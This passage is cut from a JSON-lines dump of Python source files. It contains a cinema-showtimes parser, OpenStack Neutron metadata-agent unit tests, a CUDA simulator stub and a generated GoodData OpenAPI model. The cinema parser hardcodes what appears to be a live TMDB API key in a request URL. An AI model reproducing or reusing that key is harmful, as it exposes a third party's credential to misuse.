tag'\n sys.stdout.flush()\n return ''\n\n cinema_url = fst_ref_url.split('=')[1].split('&')[0]\n print(cinema_url)\n sys.stdout.flush()\n return cinema_url\n\n def fast_get_film_info(self, film_name):\n \"\"\"\n Given FILM_NAME, this will find the corresponding movie poster and\n return the image url for the movie poster.\n \"\"\"\n error_url = 'https://literalminded.files.wordpress.com' \\\n '/2010/11/image-unavailable1.png'\n error_overview = ''\n if '&' in film_name:\n film_name = 'and'.join(film_name.split('&'))\n\n film_name = film_name.encode('utf-8')\n api_url = 'https://api.themoviedb.org/3/search/movie?api_key=' \\\n 'ab499564677631cc1c25f6749d42a16e' \\\n '&language=en-US&query={}'.format(film_name)\n res = requests.get(api_url).json()\n\n if res['total_results'] == 0:\n return error_url, error_overview\n\n first_result = res['results'][0]\n\n poster_path = first_result['poster_path']\n if poster_path is None:\n img_url = error_url\n else:\n img_url = 'http://image.tmdb.org/t/p/w154' + poster_path\n\n overview = first_result['overview']\n if overview is None:\n overview = error_overview\n else:\n groups = overview.split('.')\n overview = '.'.join(groups[:2])\n if overview[-1] != '.':\n overview += '.'\n\n return img_url, overview\n\n def get_films_for_cinemas(self, date):\n \"\"\"\n Give this function a cinema ID and day and we can populate FILMS with\n all film showings and times.\n :param date: Date to get cinema films for.\n :return:\n \"\"\"\n global CINEMA_CID, CINEMA_DIST\n local_data = {}\n\n def get_films_for_cinema(cinema):\n # Get the cinema ID for a given cinema,\n # E.g. Cineworld London - Enfield: 10477\n cinema_id = CINEMA_CID[cinema]\n # Get list of films showing at this cinema\n url = \"https://mysterious-eyrie-40497.herokuapp.com/cinemas/{}/\" \\\n \"showings/{}\".format(cinema_id, date)\n #url = \"http://moviesapi.herokuapp.com/cinemas/{}/\" \\\n # \"showings/{}\".format(cinema_id, date)\n films = requests.get(url)\n # Create a JSON object storing film name, cinema, showtimes and\n # distance to the cinema.\n films_json = films.json()\n\n for i in films_json:\n filmname = i[\"title\"]\n times = i['time']\n if filmname in local_data:\n local_data[filmname][\"cinema\"].append(\n {cinema: [{\"showtimes\": times}]})\n else:\n local_data[filmname] = {}\n poster, overview = self.fast_get_film_info(filmname)\n local_data[filmname][\"image\"] = poster\n local_data[filmname][\"overview\"] = overview\n local_data[filmname][\"cinema\"] = \\\n [{cinema: [{\"showtimes\": times}]}]\n\n executor = concurrent.futures.ThreadPoolExecutor(NUM_OF_CINEMAS)\n futures = [executor.submit(get_films_for_cinema, cinema_name)\n for cinema_name in CINEMA_CID.keys()]\n concurrent.futures.wait(futures)\n\n return local_data\n\n def parse_date(self, day, month, year):\n \"\"\"Convert date into a suitable format for use by the external API.\"\"\"\n day = str(day)\n month = str(month)\n year = str(year)\n\n if len(day) == 1:\n day = \"0\" + day\n if len(month) == 1:\n month = \"0\" + month\n return year + \"-\" + month + \"-\" + day\n\n def get_local_data(self, day, month, year, latitude, longitude):\n \"\"\"Get all film data for a given location.\"\"\"\n self.get_cinemas_latlong(latitude, longitude)\n formatted_date = self.parse_date(day, month, year)\n return self.get_films_for_cinemas(formatted_date)\n\n\nif __name__ == '__main__':\n dParser = DataParser()\n # print dParser.get_latlong(\"en12lz\")\n start_time = time.time()\n pprint.PrettyPrinter(indent=4).pprint(\n dParser.get_local_data(25, 
6, 2017, 51.636743, -0.069069))\n print dParser.get_cinema_url('Cineworld fullham road')\n print time.time() - start_time\n"} {"ext": "py", "sha": "1a314c00e6c61d3956b76b8d40b25886d14a7cfb", "content": "# Copyright 2012 New Dream Network, LLC (DreamHost)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport contextlib\n\nimport mock\nimport testtools\nimport webob\n\nfrom neutron.agent.linux import utils as agent_utils\nfrom neutron.agent.metadata import agent\nfrom neutron.agent import metadata_agent\nfrom neutron.common import constants\nfrom neutron.common import utils\nfrom neutron.tests import base\n\n\nclass FakeConf(object):\n admin_user = 'neutron'\n admin_password = 'password'\n admin_tenant_name = 'tenant'\n auth_url = 'http://127.0.0.1'\n auth_strategy = 'keystone'\n auth_region = 'region'\n auth_insecure = False\n auth_ca_cert = None\n endpoint_type = 'adminURL'\n nova_metadata_ip = '9.9.9.9'\n nova_metadata_port = 8775\n metadata_proxy_shared_secret = 'secret'\n nova_metadata_protocol = 'http'\n nova_metadata_insecure = True\n nova_client_cert = 'nova_cert'\n nova_client_priv_key = 'nova_priv_key'\n cache_url = ''\n\n\nclass FakeConfCache(FakeConf):\n cache_url = 'memory://?default_ttl=5'\n\n\nclass TestMetadataProxyHandlerBase(base.BaseTestCase):\n fake_conf = FakeConf\n\n def setUp(self):\n super(TestMetadataProxyHandlerBase, self).setUp()\n self.log_p = mock.patch.object(agent, 'LOG')\n self.log = self.log_p.start()\n self.handler = agent.MetadataProxyHandler(self.fake_conf)\n self.handler.plugin_rpc = mock.Mock()\n self.handler.context = mock.Mock()\n\n\nclass TestMetadataProxyHandlerRpc(TestMetadataProxyHandlerBase):\n def test_get_port_filters(self):\n router_id = 'test_router_id'\n ip = '1.2.3.4'\n networks = ('net_id1', 'net_id2')\n expected = {'device_id': [router_id],\n 'device_owner': constants.ROUTER_INTERFACE_OWNERS,\n 'network_id': networks,\n 'fixed_ips': {'ip_address': [ip]}}\n actual = self.handler._get_port_filters(router_id, ip, networks)\n self.assertEqual(expected, actual)\n\n def test_get_router_networks(self):\n router_id = 'router-id'\n expected = ('network_id1', 'network_id2')\n ports = [{'network_id': 'network_id1', 'something': 42},\n {'network_id': 'network_id2', 'something_else': 32}]\n self.handler.plugin_rpc.get_ports.return_value = ports\n networks = self.handler._get_router_networks(router_id)\n self.assertEqual(expected, networks)\n\n def test_get_ports_for_remote_address(self):\n ip = '1.1.1.1'\n networks = ('network_id1', 'network_id2')\n expected = [{'port_id': 'port_id1'},\n {'port_id': 'port_id2'}]\n self.handler.plugin_rpc.get_ports.return_value = expected\n ports = self.handler._get_ports_for_remote_address(ip, networks)\n self.assertEqual(expected, ports)\n\n def test_get_ports_using_rpc_fallback_to_client(self):\n ip = '1.1.1.1'\n networks = ('network_id1', 'network_id2')\n self.handler.plugin_rpc.get_ports.side_effect = AttributeError\n with mock.patch('neutronclient.v2_0.client.Client') as neutron_client:\n mock_list_ports = 
neutron_client.return_value.list_ports\n expected_ports = {'ports': ['expected_port']}\n mock_list_ports.return_value = expected_ports\n ports = self.handler._get_ports_from_server(ip_address=ip,\n networks=networks)\n self.assertEqual(expected_ports['ports'], ports)\n\n\nclass TestMetadataProxyHandlerCache(TestMetadataProxyHandlerBase):\n fake_conf = FakeConfCache\n\n def setUp(self):\n super(TestMetadataProxyHandlerCache, self).setUp()\n self.qclient_p = mock.patch('neutronclient.v2_0.client.Client')\n self.qclient = self.qclient_p.start()\n self.handler.use_rpc = False\n\n def test_call(self):\n req = mock.Mock()\n with mock.patch.object(self.handler,\n '_get_instance_and_tenant_id') as get_ids:\n get_ids.return_value = ('instance_id', 'tenant_id')\n with mock.patch.object(self.handler, '_proxy_request') as proxy:\n proxy.return_value = 'value'\n\n retval = self.handler(req)\n self.assertEqual(retval, 'value')\n\n def test_call_no_instance_match(self):\n req = mock.Mock()\n with mock.patch.object(self.handler,\n '_get_instance_and_tenant_id') as get_ids:\n get_ids.return_value = None, None\n retval = self.handler(req)\n self.assertIsInstance(retval, webob.exc.HTTPNotFound)\n\n def test_call_internal_server_error(self):\n req = mock.Mock()\n with mock.patch.object(self.handler,\n '_get_instance_and_tenant_id') as get_ids:\n get_ids.side_effect = Exception\n retval = self.handler(req)\n self.assertIsInstance(retval, webob.exc.HTTPInternalServerError)\n self.assertEqual(len(self.log.mock_calls), 2)\n\n def test_get_router_networks(self):\n router_id = 'router-id'\n expected = ('network_id1', 'network_id2')\n ports = {'ports': [{'network_id': 'network_id1', 'something': 42},\n {'network_id': 'network_id2',\n 'something_else': 32}],\n 'not_used': [1, 2, 3]}\n mock_list_ports = self.qclient.return_value.list_ports\n mock_list_ports.return_value = ports\n networks = self.handler._get_router_networks(router_id)\n mock_list_ports.assert_called_once_with(\n device_id=router_id,\n device_owner=constants.ROUTER_INTERFACE_OWNERS)\n self.assertEqual(expected, networks)\n\n def _test_get_router_networks_twice_helper(self):\n router_id = 'router-id'\n ports = {'ports': [{'network_id': 'network_id1', 'something': 42}],\n 'not_used': [1, 2, 3]}\n expected_networks = ('network_id1',)\n with mock.patch(\n 'oslo_utils.timeutils.utcnow_ts', return_value=0):\n mock_list_ports = self.qclient.return_value.list_ports\n mock_list_ports.return_value = ports\n networks = self.handler._get_router_networks(router_id)\n mock_list_ports.assert_called_once_with(\n device_id=router_id,\n device_owner=constants.ROUTER_INTERFACE_OWNERS)\n self.assertEqual(expected_networks, networks)\n networks = self.handler._get_router_networks(router_id)\n\n def test_get_router_networks_twice(self):\n self._test_get_router_networks_twice_helper()\n self.assertEqual(\n 1, self.qclient.return_value.list_ports.call_count)\n\n def _get_ports_for_remote_address_cache_hit_helper(self):\n remote_address = 'remote_address'\n networks = ('net1', 'net2')\n fixed_ips = [\"ip_address=%s\" % remote_address]\n mock_list_ports = self.qclient.return_value.list_ports\n mock_list_ports.return_value = {'ports': [{'network_id': 'net1',\n 'something': 42}]}\n self.handler._get_ports_for_remote_address(remote_address, networks)\n mock_list_ports.assert_called_once_with(\n network_id=networks, fixed_ips=fixed_ips)\n self.assertEqual(1, mock_list_ports.call_count)\n self.handler._get_ports_for_remote_address(remote_address,\n networks)\n\n def 
test_get_ports_for_remote_address_cache_hit(self):\n self._get_ports_for_remote_address_cache_hit_helper()\n self.assertEqual(\n 1, self.qclient.return_value.list_ports.call_count)\n\n def test_get_ports_network_id(self):\n network_id = 'network-id'\n router_id = 'router-id'\n remote_address = 'remote-address'\n expected = ['port1']\n networks = (network_id,)\n with contextlib.nested(\n mock.patch.object(self.handler, '_get_ports_for_remote_address'),\n mock.patch.object(self.handler, '_get_router_networks')\n ) as (mock_get_ip_addr, mock_get_router_networks):\n mock_get_ip_addr.return_value = expected\n ports = self.handler._get_ports(remote_address, network_id,\n router_id)\n mock_get_ip_addr.assert_called_once_with(remote_address,\n networks)\n self.assertFalse(mock_get_router_networks.called)\n self.assertEqual(expected, ports)\n\n def test_get_ports_router_id(self):\n router_id = 'router-id'\n remote_address = 'remote-address'\n expected = ['port1']\n networks = ('network1', 'network2')\n with contextlib.nested(\n mock.patch.object(self.handler,\n '_get_ports_for_remote_address',\n return_value=expected),\n mock.patch.object(self.handler,\n '_get_router_networks',\n return_value=networks)\n ) as (mock_get_ip_addr, mock_get_router_networks):\n ports = self.handler._get_ports(remote_address,\n router_id=router_id)\n mock_get_router_networks.called_once_with(router_id)\n mock_get_ip_addr.assert_called_once_with(remote_address, networks)\n self.assertEqual(expected, ports)\n\n def test_get_ports_no_id(self):\n self.assertRaises(TypeError, self.handler._get_ports, 'remote_address')\n\n def _get_instance_and_tenant_id_helper(self, headers, list_ports_retval,\n networks=None, router_id=None):\n remote_address = '192.168.1.1'\n headers['X-Forwarded-For'] = remote_address\n req = mock.Mock(headers=headers)\n\n def mock_list_ports(*args, **kwargs):\n return {'ports': list_ports_retval.pop(0)}\n\n self.qclient.return_value.list_ports.side_effect = mock_list_ports\n self.qclient.return_value.get_auth_info.return_value = {\n 'auth_token': None, 'endpoint_url': None}\n instance_id, tenant_id = self.handler._get_instance_and_tenant_id(req)\n new_qclient_call = mock.call(\n username=FakeConf.admin_user,\n tenant_name=FakeConf.admin_tenant_name,\n region_name=FakeConf.auth_region,\n auth_url=FakeConf.auth_url,\n password=FakeConf.admin_password,\n auth_strategy=FakeConf.auth_strategy,\n token=None,\n insecure=FakeConf.auth_insecure,\n ca_cert=FakeConf.auth_ca_cert,\n endpoint_url=None,\n endpoint_type=FakeConf.endpoint_type)\n\n expected = []\n\n if router_id:\n expected.extend([\n new_qclient_call,\n mock.call().list_ports(\n device_id=router_id,\n device_owner=constants.ROUTER_INTERFACE_OWNERS\n ),\n mock.call().get_auth_info()\n ])\n\n expected.extend([\n new_qclient_call,\n mock.call().list_ports(\n network_id=networks, fixed_ips=['ip_address=192.168.1.1']),\n mock.call().get_auth_info()\n ])\n\n self.qclient.assert_has_calls(expected)\n\n return (instance_id, tenant_id)\n\n def test_get_instance_id_router_id(self):\n router_id = 'the_id'\n headers = {\n 'X-Neutron-Router-ID': router_id\n }\n\n networks = ('net1', 'net2')\n ports = [\n [{'network_id': 'net1'}, {'network_id': 'net2'}],\n [{'device_id': 'device_id', 'tenant_id': 'tenant_id',\n 'network_id': 'net1'}]\n ]\n\n self.assertEqual(\n self._get_instance_and_tenant_id_helper(headers, ports,\n networks=networks,\n router_id=router_id),\n ('device_id', 'tenant_id')\n )\n\n def test_get_instance_id_router_id_no_match(self):\n router_id = 
'the_id'\n headers = {\n 'X-Neutron-Router-ID': router_id\n }\n\n networks = ('net1', 'net2')\n ports = [\n [{'network_id': 'net1'}, {'network_id': 'net2'}],\n []\n ]\n self.assertEqual(\n self._get_instance_and_tenant_id_helper(headers, ports,\n networks=networks,\n router_id=router_id),\n (None, None)\n )\n\n def test_get_instance_id_network_id(self):\n network_id = 'the_id'\n headers = {\n 'X-Neutron-Network-ID': network_id\n }\n\n ports = [\n [{'device_id': 'device_id',\n 'tenant_id': 'tenant_id',\n 'network_id': 'the_id'}]\n ]\n\n self.assertEqual(\n self._get_instance_and_tenant_id_helper(headers, ports,\n networks=('the_id',)),\n ('device_id', 'tenant_id')\n )\n\n def test_get_instance_id_network_id_no_match(self):\n network_id = 'the_id'\n headers = {\n 'X-Neutron-Network-ID': network_id\n }\n\n ports = [[]]\n\n self.assertEqual(\n self._get_instance_and_tenant_id_helper(headers, ports,\n networks=('the_id',)),\n (None, None)\n )\n\n def test_auth_info_cache(self):\n router_id = 'the_id'\n list_ports = [\n [{'network_id': 'net1'}],\n [{'device_id': 'did', 'tenant_id': 'tid', 'network_id': 'net1'}]]\n\n def update_get_auth_info(*args, **kwargs):\n self.qclient.return_value.get_auth_info.return_value = {\n 'auth_token': 'token', 'endpoint_url': 'uri'}\n return {'ports': list_ports.pop(0)}\n\n self.qclient.return_value.list_ports.side_effect = update_get_auth_info\n\n new_qclient_call = mock.call(\n username=FakeConf.admin_user,\n tenant_name=FakeConf.admin_tenant_name,\n region_name=FakeConf.auth_region,\n auth_url=FakeConf.auth_url,\n password=FakeConf.admin_password,\n auth_strategy=FakeConf.auth_strategy,\n token=None,\n insecure=FakeConf.auth_insecure,\n ca_cert=FakeConf.auth_ca_cert,\n endpoint_url=None,\n endpoint_type=FakeConf.endpoint_type)\n\n cached_qclient_call = mock.call(\n username=FakeConf.admin_user,\n tenant_name=FakeConf.admin_tenant_name,\n region_name=FakeConf.auth_region,\n auth_url=FakeConf.auth_url,\n password=FakeConf.admin_password,\n auth_strategy=FakeConf.auth_strategy,\n token='token',\n insecure=FakeConf.auth_insecure,\n ca_cert=FakeConf.auth_ca_cert,\n endpoint_url='uri',\n endpoint_type=FakeConf.endpoint_type)\n\n headers = {'X-Forwarded-For': '192.168.1.10',\n 'X-Neutron-Router-ID': router_id}\n req = mock.Mock(headers=headers)\n self.handler._get_instance_and_tenant_id(req)\n\n expected = [\n new_qclient_call,\n mock.call().list_ports(\n device_id=router_id,\n device_owner=constants.ROUTER_INTERFACE_OWNERS\n ),\n mock.call().get_auth_info(),\n cached_qclient_call,\n mock.call().list_ports(network_id=('net1',),\n fixed_ips=['ip_address=192.168.1.10']),\n mock.call().get_auth_info(),\n ]\n\n self.qclient.assert_has_calls(expected)\n\n def _proxy_request_test_helper(self, response_code=200, method='GET'):\n hdrs = {'X-Forwarded-For': '8.8.8.8'}\n body = 'body'\n\n req = mock.Mock(path_info='/the_path', query_string='', headers=hdrs,\n method=method, body=body)\n resp = mock.MagicMock(status=response_code)\n req.response = resp\n with mock.patch.object(self.handler, '_sign_instance_id') as sign:\n sign.return_value = 'signed'\n with mock.patch('httplib2.Http') as mock_http:\n resp.__getitem__.return_value = \"text/plain\"\n mock_http.return_value.request.return_value = (resp, 'content')\n\n retval = self.handler._proxy_request('the_id', 'tenant_id',\n req)\n mock_http.assert_called_once_with(\n ca_certs=None, disable_ssl_certificate_validation=True)\n mock_http.assert_has_calls([\n mock.call().add_certificate(\n FakeConf.nova_client_priv_key,\n 
FakeConf.nova_client_cert,\n \"%s:%s\" % (FakeConf.nova_metadata_ip,\n FakeConf.nova_metadata_port)\n ),\n mock.call().request(\n 'http://9.9.9.9:8775/the_path',\n method=method,\n headers={\n 'X-Forwarded-For': '8.8.8.8',\n 'X-Instance-ID-Signature': 'signed',\n 'X-Instance-ID': 'the_id',\n 'X-Tenant-ID': 'tenant_id'\n },\n body=body\n )]\n )\n\n return retval\n\n def test_proxy_request_post(self):\n response = self._proxy_request_test_helper(method='POST')\n self.assertEqual(response.content_type, \"text/plain\")\n self.assertEqual(response.body, 'content')\n\n def test_proxy_request_200(self):\n response = self._proxy_request_test_helper(200)\n self.assertEqual(response.content_type, \"text/plain\")\n self.assertEqual(response.body, 'content')\n\n def test_proxy_request_400(self):\n self.assertIsInstance(self._proxy_request_test_helper(400),\n webob.exc.HTTPBadRequest)\n\n def test_proxy_request_403(self):\n self.assertIsInstance(self._proxy_request_test_helper(403),\n webob.exc.HTTPForbidden)\n\n def test_proxy_request_404(self):\n self.assertIsInstance(self._proxy_request_test_helper(404),\n webob.exc.HTTPNotFound)\n\n def test_proxy_request_409(self):\n self.assertIsInstance(self._proxy_request_test_helper(409),\n webob.exc.HTTPConflict)\n\n def test_proxy_request_500(self):\n self.assertIsInstance(self._proxy_request_test_helper(500),\n webob.exc.HTTPInternalServerError)\n\n def test_proxy_request_other_code(self):\n with testtools.ExpectedException(Exception):\n self._proxy_request_test_helper(302)\n\n def test_sign_instance_id(self):\n self.assertEqual(\n self.handler._sign_instance_id('foo'),\n '773ba44693c7553d6ee20f61ea5d2757a9a4f4a44d2841ae4e95b52e4cd62db4'\n )\n\n\nclass TestMetadataProxyHandlerNoCache(TestMetadataProxyHandlerCache):\n fake_conf = FakeConf\n\n def test_get_router_networks_twice(self):\n self._test_get_router_networks_twice_helper()\n self.assertEqual(\n 2, self.qclient.return_value.list_ports.call_count)\n\n def test_get_ports_for_remote_address_cache_hit(self):\n self._get_ports_for_remote_address_cache_hit_helper()\n self.assertEqual(\n 2, self.qclient.return_value.list_ports.call_count)\n\n\nclass TestUnixDomainMetadataProxy(base.BaseTestCase):\n def setUp(self):\n super(TestUnixDomainMetadataProxy, self).setUp()\n self.cfg_p = mock.patch.object(agent, 'cfg')\n self.cfg = self.cfg_p.start()\n looping_call_p = mock.patch(\n 'neutron.openstack.common.loopingcall.FixedIntervalLoopingCall')\n self.looping_mock = looping_call_p.start()\n self.cfg.CONF.metadata_proxy_socket = '/the/path'\n self.cfg.CONF.metadata_workers = 0\n self.cfg.CONF.metadata_backlog = 128\n\n @mock.patch.object(agent_utils, 'ensure_dir')\n def test_init_doesnot_exists(self, ensure_dir):\n agent.UnixDomainMetadataProxy(mock.Mock())\n ensure_dir.assert_called_once_with('/the')\n\n def test_init_exists(self):\n with mock.patch('os.path.isdir') as isdir:\n with mock.patch('os.unlink') as unlink:\n isdir.return_value = True\n agent.UnixDomainMetadataProxy(mock.Mock())\n unlink.assert_called_once_with('/the/path')\n\n def test_init_exists_unlink_no_file(self):\n with mock.patch('os.path.isdir') as isdir:\n with mock.patch('os.unlink') as unlink:\n with mock.patch('os.path.exists') as exists:\n isdir.return_value = True\n exists.return_value = False\n unlink.side_effect = OSError\n\n agent.UnixDomainMetadataProxy(mock.Mock())\n unlink.assert_called_once_with('/the/path')\n\n def test_init_exists_unlink_fails_file_still_exists(self):\n with mock.patch('os.path.isdir') as isdir:\n with 
mock.patch('os.unlink') as unlink:\n with mock.patch('os.path.exists') as exists:\n isdir.return_value = True\n exists.return_value = True\n unlink.side_effect = OSError\n\n with testtools.ExpectedException(OSError):\n agent.UnixDomainMetadataProxy(mock.Mock())\n unlink.assert_called_once_with('/the/path')\n\n @mock.patch.object(agent, 'MetadataProxyHandler')\n @mock.patch.object(agent_utils, 'UnixDomainWSGIServer')\n @mock.patch.object(agent_utils, 'ensure_dir')\n def test_run(self, ensure_dir, server, handler):\n p = agent.UnixDomainMetadataProxy(self.cfg.CONF)\n p.run()\n\n ensure_dir.assert_called_once_with('/the')\n server.assert_has_calls([\n mock.call('neutron-metadata-agent'),\n mock.call().start(handler.return_value,\n '/the/path', workers=0,\n backlog=128),\n mock.call().wait()]\n )\n\n def test_main(self):\n with mock.patch.object(agent, 'UnixDomainMetadataProxy') as proxy:\n with mock.patch.object(metadata_agent, 'config') as config:\n with mock.patch.object(metadata_agent, 'cfg') as cfg:\n with mock.patch.object(utils, 'cfg'):\n metadata_agent.main()\n\n self.assertTrue(config.setup_logging.called)\n proxy.assert_has_calls([\n mock.call(cfg.CONF),\n mock.call().run()]\n )\n\n def test_init_state_reporting(self):\n with mock.patch('os.makedirs'):\n proxy = agent.UnixDomainMetadataProxy(mock.Mock())\n self.looping_mock.assert_called_once_with(proxy._report_state)\n self.looping_mock.return_value.start.assert_called_once_with(\n interval=mock.ANY)\n\n def test_report_state(self):\n with mock.patch('neutron.agent.rpc.PluginReportStateAPI') as state_api:\n with mock.patch('os.makedirs'):\n proxy = agent.UnixDomainMetadataProxy(mock.Mock())\n self.assertTrue(proxy.agent_state['start_flag'])\n proxy._report_state()\n self.assertNotIn('start_flag', proxy.agent_state)\n state_api_inst = state_api.return_value\n state_api_inst.report_state.assert_called_once_with(\n proxy.context, proxy.agent_state, use_call=True)\n"} {"ext": "py", "sha": "1a314c6e2c20b483b369cb85d8c4a4a95c519d14", "content": "from .simulator import *\n\n\ndef is_available():\n \"\"\"Returns a boolean to indicate the availability of a CUDA GPU.\n \"\"\"\n # Simulator is always available\n return True\n\n\ndef cuda_error():\n \"\"\"Returns None or an exception if the CUDA driver fails to initialize.\n \"\"\"\n # Simulator never fails to initialize\n return None\n\n\n\n"} {"ext": "py", "sha": "1a314cf82308bb579c801cad55065a85d1e0e2e0", "content": "\"\"\"\n OpenAPI definition\n\n No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501\n\n The version of the OpenAPI document: v0\n Contact: support@gooddata.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport re # noqa: F401\nimport sys # noqa: F401\n\nfrom gooddata_metadata_client.model_utils import ( # noqa: F401\n ApiTypeError,\n ModelComposed,\n ModelNormal,\n ModelSimple,\n cached_property,\n change_keys_js_to_python,\n convert_js_args_to_python_args,\n date,\n datetime,\n file_type,\n none_type,\n validate_get_composed_info,\n OpenApiModel\n)\nfrom gooddata_metadata_client.exceptions import ApiAttributeError\n\n\ndef lazy_import():\n from gooddata_metadata_client.model.json_api_metric_patch_attributes import JsonApiMetricPatchAttributes\n globals()['JsonApiMetricPatchAttributes'] = JsonApiMetricPatchAttributes\n\n\nclass JsonApiMetricPatch(ModelNormal):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class 
manually.\n\n Attributes:\n allowed_values (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n with a capitalized key describing the allowed value and an allowed\n value. These dicts store the allowed enum values.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n discriminator_value_class_map (dict): A dict to go from the discriminator\n variable value to the discriminator class name.\n validations (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n that stores validations for max_length, min_length, max_items,\n min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,\n inclusive_minimum, and regex.\n additional_properties_type (tuple): A tuple of classes accepted\n as additional properties values.\n \"\"\"\n\n allowed_values = {\n ('type',): {\n 'METRIC': \"metric\",\n },\n }\n\n validations = {\n ('id',): {\n 'regex': {\n 'pattern': r'^((?!\\.)[.A-Za-z0-9_-]{1,255}:)?(?!\\.)[.A-Za-z0-9_-]{1,255}$', # noqa: E501\n },\n },\n }\n\n @cached_property\n def additional_properties_type():\n \"\"\"\n This must be a method because a model may have properties that are\n of type self, this must run after the class is loaded\n \"\"\"\n lazy_import()\n return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501\n\n _nullable = False\n\n @cached_property\n def openapi_types():\n \"\"\"\n This must be a method because a model may have properties that are\n of type self, this must run after the class is loaded\n\n Returns\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n \"\"\"\n lazy_import()\n return {\n 'attributes': (JsonApiMetricPatchAttributes,), # noqa: E501\n 'id': (str,), # noqa: E501\n 'type': (str,), # noqa: E501\n }\n\n @cached_property\n def discriminator():\n return None\n\n\n attribute_map = {\n 'attributes': 'attributes', # noqa: E501\n 'id': 'id', # noqa: E501\n 'type': 'type', # noqa: E501\n }\n\n read_only_vars = {\n }\n\n _composed_schemas = {}\n\n @classmethod\n @convert_js_args_to_python_args\n def _from_openapi_data(cls, attributes, id, *args, **kwargs): # noqa: E501\n \"\"\"JsonApiMetricPatch - a model defined in OpenAPI\n\n Args:\n attributes (JsonApiMetricPatchAttributes):\n id (str): API identifier of an object\n\n Keyword Args:\n type (str): Object type. defaults to \"metric\", must be one of [\"metric\", ] # noqa: E501\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _spec_property_naming (bool): True if the variable names in the input data\n are serialized names, as specified in the OpenAPI document.\n False if the variable names in the input data\n are pythonic names, e.g. 
snake case (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n _visited_composed_classes (tuple): This stores a tuple of\n classes that we have traveled through so that\n if we see that class again we will not use its\n discriminator again.\n When traveling through a discriminator, the\n composed schema that is\n is traveled through is added to this set.\n For example if Animal has a discriminator\n petType and we pass in \"Dog\", and the class Dog\n allOf includes Animal, we move through Animal\n once using the discriminator, and pick Dog.\n Then in Dog, we will make an instance of the\n Animal class but this time we won't travel\n through its discriminator because we passed in\n _visited_composed_classes = (Animal,)\n \"\"\"\n\n type = kwargs.get('type', \"metric\")\n _check_type = kwargs.pop('_check_type', True)\n _spec_property_naming = kwargs.pop('_spec_property_naming', True)\n _path_to_item = kwargs.pop('_path_to_item', ())\n _configuration = kwargs.pop('_configuration', None)\n _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())\n\n self = super(OpenApiModel, cls).__new__(cls)\n\n if args:\n for arg in args:\n if isinstance(arg, dict):\n kwargs.update(arg)\n else:\n raise ApiTypeError(\n \"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.\" % (\n args,\n self.__class__.__name__,\n ),\n path_to_item=_path_to_item,\n valid_classes=(self.__class__,),\n )\n\n self._data_store = {}\n self._check_type = _check_type\n self._spec_property_naming = _spec_property_naming\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n self._visited_composed_classes = _visited_composed_classes + (self.__class__,)\n\n self.attributes = attributes\n self.id = id\n self.type = type\n for var_name, var_value in kwargs.items():\n if var_name not in self.attribute_map and \\\n self._configuration is not None and \\\n self._configuration.discard_unknown_keys and \\\n self.additional_properties_type is None:\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n return self\n\n required_properties = set([\n '_data_store',\n '_check_type',\n '_spec_property_naming',\n '_path_to_item',\n '_configuration',\n '_visited_composed_classes',\n ])\n\n @convert_js_args_to_python_args\n def __init__(self, attributes, id, *args, **kwargs): # noqa: E501\n \"\"\"JsonApiMetricPatch - a model defined in OpenAPI\n\n Args:\n attributes (JsonApiMetricPatchAttributes):\n id (str): API identifier of an object\n\n Keyword Args:\n type (str): Object type. defaults to \"metric\", must be one of [\"metric\", ] # noqa: E501\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _spec_property_naming (bool): True if the variable names in the input data\n are serialized names, as specified in the OpenAPI document.\n False if the variable names in the input data\n are pythonic names, e.g. 
snake case (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n _visited_composed_classes (tuple): This stores a tuple of\n classes that we have traveled through so that\n if we see that class again we will not use its\n discriminator again.\n When traveling through a discriminator, the\n composed schema that is\n is traveled through is added to this set.\n For example if Animal has a discriminator\n petType and we pass in \"Dog\", and the class Dog\n allOf includes Animal, we move through Animal\n once using the discriminator, and pick Dog.\n Then in Dog, we will make an instance of the\n Animal class but this time we won't travel\n through its discriminator because we passed in\n _visited_composed_classes = (Animal,)\n \"\"\"\n\n type = kwargs.get('type', \"metric\")\n _check_type = kwargs.pop('_check_type', True)\n _spec_property_naming = kwargs.pop('_spec_property_naming', False)\n _path_to_item = kwargs.pop('_path_to_item', ())\n _configuration = kwargs.pop('_configuration', None)\n _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())\n\n if args:\n for arg in args:\n if isinstance(arg, dict):\n kwargs.update(arg)\n else:\n raise ApiTypeError(\n \"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.\" % (\n args,\n self.__class__.__name__,\n ),\n path_to_item=_path_to_item,\n valid_classes=(self.__class__,),\n )\n\n self._data_store = {}\n self._check_type = _check_type\n self._spec_property_naming = _spec_property_naming\n self._path_to_item = _path_to_item\n self._configuration = 